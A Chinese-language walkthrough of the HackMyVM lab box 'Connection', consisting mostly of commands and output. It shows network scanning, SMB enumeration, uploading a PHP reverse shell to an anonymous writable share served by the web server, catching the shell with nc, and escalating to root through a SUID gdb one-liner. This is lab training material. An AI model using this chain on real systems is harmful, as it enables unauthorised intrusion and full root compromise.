lvzhouhang
0%

HackmyVM-Connection

发表于 分类于
本文字数: 4k 阅读时长 ≈ 4 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/script]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.77   08:00:27:2a:5f:aa       PCS Systemtechnik GmbH
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)
192.168.31.187  a6:9b:e0:2d:30:9a       (Unknown: locally administered)
192.168.31.85   7e:2c:58:df:4e:cb       (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 5 responded

ip为192.168.31.77,nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~/Desktop/script]
└─# nmap 192.168.31.77 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 09:09 EST
Nmap scan report for connection (192.168.31.77)
Host is up (0.00064s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:2A:5F:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

445端口

开启了445端口

用enum4linux进行枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 =================================( Share Enumeration on 192.168.31.77 )=================================


        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CONNECTION

[+] Attempting to map shares on 192.168.31.77

//192.168.31.77/share   Mapping: OK Listing: OK Writing: N/A
//192.168.31.77/print$  Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.31.77/IPC$    Mapping: N/A Listing: N/A Writing: N/A

smbclint可以匿名登陆share里有一个html,随便往里传一个文件发现在80端口访问到,传一个反弹shell的php文件

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Desktop/script]
└─# smbclient  //192.168.31.77/share
Password for [WORKGROUP\root]:
Anonymous login successful
smb: \> cd html\
smb: \html\>
smb: \html\> put rev.php
putting file rev.php as \html\rev.php (447.0 kb/s) (average 447.0 kb/s)
smb: \html\> exit
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/script]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.31.129] from (UNKNOWN) [192.168.31.77] 45632
Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 09:12:44 up 4 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

接收到shell了

提权

用python获得一个更好的终端

1
2
$  python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@connection:/$

查找suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@connection:/$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpassw

可以利用gdb进行suid提权

https://gtfobins.github.io/gtfobins/gdb/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
<mport os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

发现进到root组里了,提权结束